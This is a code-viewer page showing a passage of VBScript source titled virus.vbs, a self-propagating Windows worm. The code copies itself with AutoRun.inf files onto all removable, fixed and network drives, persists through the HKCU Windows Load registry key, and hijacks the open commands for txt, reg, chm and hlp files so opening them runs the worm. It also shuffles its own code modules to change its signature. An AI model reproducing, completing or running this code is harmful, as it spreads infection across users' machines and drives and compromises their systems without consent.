📄 virus.vbs
字号:
If UserName = "" Then
GetUserName = "Scripting.FileSystemObject"
Else
GetFSOName = UserName
End If
End Function
Function GetHeadTail(l)
Dim Str , buffer
If l = 0 Then
GetHeadTail = "'" & GetUserName()
Else
buffer = GetUserName()
Str = ""
For i = 1 To Len(buffer)
Str = Mid(buffer, i, 1) & Str
GetHeadTail = "'" & Str
Next
End If
End Function
'ZHISYBKQRKB2_22
'WNXCBDYNEYIEB1_4
Function Head()
Head = VBCRLF & "'WNXCBDYNEYIEB1_1" & VBCRLF &_
"On Error Resume Next" & VBCRLF &_
"Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V" & VBCRLF &_
"Dim ModelHead, ModelTail" & VBCRLF &_
"Cnt = 0" & VBCRLF &_
"CntMax = 1000" & VBCRLF &_
"Version = ""4""" & VBCRLF &_
"Name_V1 = GetUserName() & "".vbs""" & VBCRLF &_
"FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向" & VBCRLF &_
"FullPath_V1 = GetSFolder(1) & Name_V1 '主要执行配置文件命令" & VBCRLF &_
"FullPath_Config= GetSFolder(1) & GetUserName() & "".ini""" & VBCRLF &_
"Sum_ModelCode = 26" & VBCRLF &_
"Head_V= GetHeadTail(0)" & VBCRLF &_
"Tail_V= GetHeadTail(1)" & VBCRLF &_
"ModelHead=""'WNXCBDYNEYIEB""" & VBCRLF &_
"ModelTail=""'ZHISYBKQRKB""" & VBCRLF
End Function
Function VictimHead()
VictimHead = Head() & VBCRLF &_
"Call VictimMain()" & VBCRLF &_
"Sub VictimMain()" & VBCRLF &_
" Call ExeVbs_Victim()" & VBCRLF &_
"End Sub" & VBCRLF &_
"'ZHISYBKQRKB1_1" & VBCRLF
End Function
Function VirusHead()
VirusHead = Head() & VBCRLF &_
"Call VirusMain()" & VBCRLF &_
"Sub VirusMain()" & VBCRLF &_
" On Error Resume Next" & VBCRLF &_
" Call ExeVbs_Virus()" & VBCRLF &_
"End Sub" & VBCRLF & VBCRLF &_
"'ZHISYBKQRKB1_1" & VBCRLF
End Function
Function WebHead()
WebHead = Head() & VBCRLF &_
"Call WebMain()" & VBCRLF &_
"Sub WebMain()" & VBCRLF &_
" On Error Resume Next" & VBCRLF &_
" Call ExeVbs_WebPage()" & VBCRLF &_
"End Sub" & VBCRLF &_
"'ZHISYBKQRKB1_1" & VBCRLF
End Function
'ZHISYBKQRKB1_4
'WNXCBDYNEYIEB2_25
Sub DeleteReg(strkey)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
tmps.RegDelete strkey
Set tmps = Nothing
End Sub
Function ReadReg(strkey)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
ReadReg = tmps.RegRead(strkey)
Set tmps = Nothing
End Function
Sub WriteReg(strkey, Value, vtype)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
If vtype = "" Then
tmps.RegWrite strkey, Value
Else
tmps.RegWrite strkey, Value, vtype
End If
Set tmps = Nothing
End Sub
'ZHISYBKQRKB2_25
'WNXCBDYNEYIEB2_16
Sub SetTxtFileAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SethlpFileAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetRegFileAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetchmFileAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
'ZHISYBKQRKB2_16
'WNXCBDYNEYIEB1_6
Sub AutoRun(objfso, D, vbsCode)
On Error Resume Next
Dim path_autorun, path_vbs, inf_autorun
path_autorun = D & ":\AutoRun.inf"
path_vbs = D & ":\" & Name_V1
If objfso.FileExists(path_vbs) = False Or objfso.FileExists(path_autorun) = False Or GetVersion(objfso, path_vbs)<Version Then
If objfso.FileExists(path_autorun) = True Then
objfso.DeleteFile path_autorun, True
End If
If objfso.FileExists(path_vbs) = True Then
objfso.DeleteFile path_vbs, True
End If
Call CopyFile(objfso, vbsCode, path_vbs)
Call SetFileAttr(objfso, path_vbs)
inf_autorun = "[AutoRun]" & VBCRLF & "Shellexecute=WScript.exe " & Name_V1 & " ""AutoRun""" & VBCRLF & "shell\AutoRun=打开(&O)" & VBCRLF & "shell\AutoRun\command=WScript.exe " & Name_V1 & " ""AutoRun""" & VBCRLF & "shell\AutoRun1=资源管理器(&X)" & VBCRLF & "shell\AutoRun1\command=WScript.exe " & Name_V1 & " ""AutoRun"""
Call CopyFile(objfso, inf_autorun, path_autorun)
Call SetFileAttr(objfso, path_autorun)
End If
End Sub
'ZHISYBKQRKB1_6
'WNXCBDYNEYIEB2_14
Function ReadOK(objfso, FullPath_OK)
On Error Resume Next
Dim vf, buffer
Set vf = objfso.OpenTextFile(FullPath_OK, 1)
buffer = vf.ReadAll
ReadOK = RTrim(Mid(buffer, InStr(buffer, "Order:") + 6, 50))
End Function
Sub WriteOK(objfso, FullPath_OK, Order_Order, Order_Para)
On Error Resume Next
Dim vf1
objfso.DeleteFile FullPath_OK, True
Set vf1 = objfso.OpenTextFile(FullPath_OK, 2, True)
vf1.Write "OK" & VBCRLF
vf1.WriteLine Date()
vf1.WriteLine "Order:" & Order_Order & "@" & Order_Para
Call SetFileAttr(objfso, FullPath_OK)
End Sub
'ZHISYBKQRKB2_14
'WNXCBDYNEYIEB1_9
Function ChangeModelOrder(vbsCode, Num_DNA)
On Error Resume Next
Dim DNA(), Array_vbsCode()
Dim i, Value, flag, j, buffer
ReDim DNA(Num_DNA), Array_vbsCode(Num_DNA)
buffer = vbsCode
Randomize
For i = 1 To Num_DNA
Do
Value = Int((Num_DNA * Rnd) + 1)
flag = 1
For j = 1 To Num_DNA
If Value = DNA(j) Then
flag = 0
Exit For
End If
Next
Loop Until flag = 1
DNA(i) = Value
Next
For i = 1 To Num_DNA
Array_vbsCode(i) = GetModelCode(buffer, i)
Next
buffer = ""
For i = 1 To Num_DNA
buffer = buffer & VBCRLF & Array_vbsCode(DNA(i)) & VBCRLF
Next
ChangeModelOrder = Head_V & Version & VBCRLF & buffer & VBCRLF & Tail_V
End Function
'ZHISYBKQRKB1_9
'WNXCBDYNEYIEB1_7
Sub InvadeSystem(objfso, vbsCode)
On Error Resume Next
Dim Value, HCULoad, vbsCode_Virus, dc, d
Value = "%SystemRoot%\System32\WScript.exe " & """" & FullPath_V0 & """" & " %1 %* "
HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
vbsCode_Virus = vbsCode
Set dc = objfso.Drives
For Each d In dc
If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
Call AutoRun(objfso, d.DriveLetter, vbsCode_Virus)
End If
Next
If objfso.FileExists(FullPath_V1) = True And GetVersion(objfso, FullPath_V1)< Version Then
objfso.DeleteFile FullPath_V1 , True
Call CopyFile(objfso, vbsCode_Virus, FullPath_V1)
Call SetFileAttr(objfso, FullPath_V1)
Else
Call CopyFile(objfso, vbsCode_Virus, FullPath_V1)
Call SetFileAttr(objfso, FullPath_V1)
End If
If objfso.FileExists(FullPath_V0) = True And GetVersion(objfso, FullPath_V0)<Version Then
objfso.DeleteFile FullPath_V0 , True
Call CopyFile(objfso, vbsCode_Virus, FullPath_V0)
Call SetFileAttr(objfso, FullPath_V0)
Else
Call CopyFile(objfso, vbsCode_Virus, FullPath_V0)
Call SetFileAttr(objfso, FullPath_V0)
End If
If ReadReg(HCULoad)<> FullPath_V1 Then
Call WriteReg (HCULoad, FullPath_V1, "")
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
Call SetTxtFileAss(FullPath_V0)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Value Then
Call SetRegFileAss(FullPath_V0)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Value Then
Call SetchmFileAss(FullPath_V0)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Value Then
Call SethlpFileAss(FullPath_V0)
End If
Call DeSafeSet()
End Sub
'ZHISYBKQRKB1_7
'WNXCBDYNEYIEB1_3
Sub ExeVbs_Virus()
On Error Resume Next
Dim objfso, objshell, FullPath_Self, Name_Self, Names
Dim oArgs, ArgNum, Para_V, SubPara_V, RunPath
Dim Order, Order_Order, Order_Para
Dim vbsCode , VbsCode_Virus, VbsCode_WebPage, VbsCode_Victim , MainBody
Set objfso = CreateObject(GetFSOName())
Set objshell = CreateObject("WScript.Shell")
FullPath_Self = WScript.ScriptFullName
Name_Self = WScript.ScriptName
Names = Array("WNXCBDYNEYIEB", "ZHISYBKQRKB")
Set oArgs = WScript.Arguments
ArgNum = 0
Do While ArgNum < oArgs.Count
Para_V = Para_V & " " & oArgs(ArgNum)
ArgNum = ArgNum + 1
Loop
SubPara_V = LCase(Right(Para_V, 3))
Select Case SubPara_V
Case "run"
RunPath = Left(FullPath_Self, 2)
Call Run(RunPath)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Case "txt", "log"
RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Para_V
Call Run(RunPath)
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -